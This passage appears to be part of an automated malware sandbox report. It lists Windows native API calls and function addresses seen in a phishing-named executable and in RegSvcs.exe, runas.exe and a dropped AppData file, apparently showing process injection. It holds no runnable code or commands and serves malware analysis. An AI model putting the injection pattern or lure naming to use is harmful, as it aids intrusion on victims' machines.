                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D3D70 NtOpenThread,8_2_015D3D70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D3D10 NtOpenProcessToken,8_2_015D3D10
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04524650 NtSuspendThread,LdrInitializeThunk,18_2_04524650
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04524340 NtSetContextThread,LdrInitializeThunk,18_2_04524340
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522C70 NtFreeVirtualMemory,LdrInitializeThunk,18_2_04522C70
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522C60 NtCreateKey,LdrInitializeThunk,18_2_04522C60
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522CA0 NtQueryInformationToken,LdrInitializeThunk,18_2_04522CA0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522D10 NtMapViewOfSection,LdrInitializeThunk,18_2_04522D10
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522D30 NtUnmapViewOfSection,LdrInitializeThunk,18_2_04522D30
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522DD0 NtDelayExecution,LdrInitializeThunk,18_2_04522DD0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522DF0 NtQuerySystemInformation,LdrInitializeThunk,18_2_04522DF0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522EE0 NtQueueApcThread,LdrInitializeThunk,18_2_04522EE0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522E80 NtReadVirtualMemory,LdrInitializeThunk,18_2_04522E80
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522F30 NtCreateSection,LdrInitializeThunk,18_2_04522F30
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522FE0 NtCreateFile,LdrInitializeThunk,18_2_04522FE0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522FB0 NtResumeThread,LdrInitializeThunk,18_2_04522FB0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522AD0 NtReadFile,LdrInitializeThunk,18_2_04522AD0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522AF0 NtWriteFile,LdrInitializeThunk,18_2_04522AF0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522B60 NtClose,LdrInitializeThunk,18_2_04522B60
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522BF0 NtAllocateVirtualMemory,LdrInitializeThunk,18_2_04522BF0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522BE0 NtQueryValueKey,LdrInitializeThunk,18_2_04522BE0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522BA0 NtEnumerateValueKey,LdrInitializeThunk,18_2_04522BA0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045235C0 NtCreateMutant,LdrInitializeThunk,18_2_045235C0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045239B0 NtGetContextThread,LdrInitializeThunk,18_2_045239B0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522C00 NtQueryInformationProcess,18_2_04522C00
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522CC0 NtQueryVirtualMemory,18_2_04522CC0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522CF0 NtOpenProcess,18_2_04522CF0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522D00 NtSetInformationFile,18_2_04522D00
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522DB0 NtEnumerateKey,18_2_04522DB0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522E30 NtWriteVirtualMemory,18_2_04522E30
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522EA0 NtAdjustPrivilegesToken,18_2_04522EA0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522F60 NtCreateProcessEx,18_2_04522F60
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522F90 NtProtectVirtualMemory,18_2_04522F90
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522FA0 NtQuerySection,18_2_04522FA0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522AB0 NtWaitForSingleObject,18_2_04522AB0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522B80 NtQueryInformationFile,18_2_04522B80
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04523010 NtOpenDirectoryObject,18_2_04523010
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04523090 NtSetValueKey,18_2_04523090
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04523D70 NtOpenThread,18_2_04523D70
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04523D10 NtOpenProcessToken,18_2_04523D10
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_005194A0 NtCreateFile,18_2_005194A0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_00519610 NtReadFile,18_2_00519610
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_00519700 NtDeleteFile,18_2_00519700
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_005197A0 NtClose,18_2_005197A0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_00519900 NtAllocateVirtualMemory,18_2_00519900
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeCode function: 0_2_077A1C780_2_077A1C78
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeCode function: 0_2_077A00400_2_077A0040
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeCode function: 0_2_077A18400_2_077A1840
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeCode function: 0_2_013342180_2_01334218
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeCode function: 0_2_01336F9F0_2_01336F9F
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeCode function: 0_2_0133D4A40_2_0133D4A4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00418BC38_2_00418BC3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004011F08_2_004011F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040298D8_2_0040298D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004029908_2_00402990
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004032908_2_00403290
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0042F2B38_2_0042F2B3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004103E38_2_004103E3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004024408_2_00402440
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040243C8_2_0040243C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00416D7C8_2_00416D7C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00416DC38_2_00416DC3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004025D08_2_004025D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040E5F38_2_0040E5F3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00402E7C8_2_00402E7C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004106038_2_00410603
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00402E808_2_00402E80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040E7438_2_0040E743
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040E7388_2_0040E738
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016281588_2_01628158
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015901008_2_01590100
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0163A1188_2_0163A118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016581CC8_2_016581CC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016541A28_2_016541A2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016601AA8_2_016601AA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016320008_2_01632000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0165A3528_2_0165A352
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016603E68_2_016603E6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015AE3F08_2_015AE3F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016402748_2_01640274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016202C08_2_016202C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A05358_2_015A0535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016605918_2_01660591
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016524468_2_01652446
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016444208_2_01644420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0164E4F68_2_0164E4F6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C47508_2_015C4750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A07708_2_015A0770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159C7C08_2_0159C7C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BC6E08_2_015BC6E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015B69628_2_015B6962
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0166A9A68_2_0166A9A6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A29A08_2_015A29A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A28408_2_015A2840
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015AA8408_2_015AA840
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CE8F08_2_015CE8F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015868B88_2_015868B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0165AB408_2_0165AB40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01656BD78_2_01656BD7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159EA808_2_0159EA80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015AAD008_2_015AAD00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0163CD1F8_2_0163CD1F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159ADE08_2_0159ADE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015B8DBF8_2_015B8DBF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A0C008_2_015A0C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01590CF28_2_01590CF2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01640CB58_2_01640CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01614F408_2_01614F40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01642F308_2_01642F30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C0F308_2_015C0F30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015E2F288_2_015E2F28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01592FC88_2_01592FC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0161EFA08_2_0161EFA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A0E598_2_015A0E59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0165EE268_2_0165EE26
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0165EEDB8_2_0165EEDB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015B2E908_2_015B2E90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0165CE938_2_0165CE93
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0166B16B8_2_0166B16B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0158F1728_2_0158F172
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D516C8_2_015D516C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015AB1B08_2_015AB1B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0165F0E08_2_0165F0E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016570E98_2_016570E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A70C08_2_015A70C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0164F0CC8_2_0164F0CC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0158D34C8_2_0158D34C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0165132D8_2_0165132D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015E739A8_2_015E739A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016412ED8_2_016412ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BB2C08_2_015BB2C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BD2F08_2_015BD2F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A52A08_2_015A52A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016575718_2_01657571
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016695C38_2_016695C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0163D5B08_2_0163D5B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015914608_2_01591460
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0165F43F8_2_0165F43F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0165F7B08_2_0165F7B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015E56308_2_015E5630
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016516CC8_2_016516CC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A99508_2_015A9950
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BB9508_2_015BB950
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016359108_2_01635910
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0160D8008_2_0160D800
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A38E08_2_015A38E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0165FB768_2_0165FB76
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01615BF08_2_01615BF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015DDBF98_2_015DDBF9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BFB808_2_015BFB80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01613A6C8_2_01613A6C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01657A468_2_01657A46
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0165FA498_2_0165FA49
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0164DAC68_2_0164DAC6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01641AA38_2_01641AA3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0163DAAC8_2_0163DAAC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015E5AA08_2_015E5AA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01657D738_2_01657D73
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A3D408_2_015A3D40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01651D5A8_2_01651D5A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BFDC08_2_015BFDC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01619C328_2_01619C32
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0165FCF28_2_0165FCF2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0165FF098_2_0165FF09
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01563FD58_2_01563FD5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01563FD28_2_01563FD2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A1F928_2_015A1F92
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0165FFB18_2_0165FFB1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A9EB08_2_015A9EB0
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeCode function: 9_2_026E42189_2_026E4218
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeCode function: 9_2_026E6F929_2_026E6F92
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeCode function: 9_2_026ED4A49_2_026ED4A4
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeCode function: 9_2_04CCC7E49_2_04CCC7E4
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeCode function: 9_2_04CC1F5F9_2_04CC1F5F
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeCode function: 9_2_04CC1F609_2_04CC1F60
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeCode function: 9_2_04CCE9A99_2_04CCE9A9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00F0600014_2_00F06000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EB010014_2_00EB0100
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00F402C014_2_00F402C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EC053514_2_00EC0535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EDC6E014_2_00EDC6E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EBC7C014_2_00EBC7C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EC077014_2_00EC0770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EE475014_2_00EE4750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EEE8F014_2_00EEE8F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EA68B814_2_00EA68B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EF889014_2_00EF8890
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00ECA84014_2_00ECA840
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EC284014_2_00EC2840
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EC29A014_2_00EC29A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00ED696214_2_00ED6962
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EBEA8014_2_00EBEA80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EB0CF214_2_00EB0CF2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EC0C0014_2_00EC0C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EBADE014_2_00EBADE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EC8DC014_2_00EC8DC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00ED8DBF14_2_00ED8DBF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00ECED7A14_2_00ECED7A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00ECAD0014_2_00ECAD00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00ED2E9014_2_00ED2E90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EC0E5914_2_00EC0E59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EB2FC814_2_00EB2FC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00F3EFA014_2_00F3EFA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00F34F4014_2_00F34F40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00F02F2814_2_00F02F28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EE0F3014_2_00EE0F30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00ECB1B014_2_00ECB1B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EF516C14_2_00EF516C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EAF17214_2_00EAF172
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EDD2F014_2_00EDD2F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EDB2C014_2_00EDB2C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EC52A014_2_00EC52A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EC33F314_2_00EC33F3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EAD34C14_2_00EAD34C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00F074E014_2_00F074E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EC349714_2_00EC3497
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EB146014_2_00EB1460
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00ECB73014_2_00ECB730
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EC38E014_2_00EC38E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00F2D80014_2_00F2D800
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EC599014_2_00EC5990
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EC995014_2_00EC9950
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EDB95014_2_00EDB950
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00F33A6C14_2_00F33A6C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00F35BF014_2_00F35BF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EFDBF914_2_00EFDBF9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EDFB8014_2_00EDFB80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00F39C3214_2_00F39C32
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00ED9C2014_2_00ED9C20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EDFDC014_2_00EDFDC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00EC3D4014_2_00EC3D40
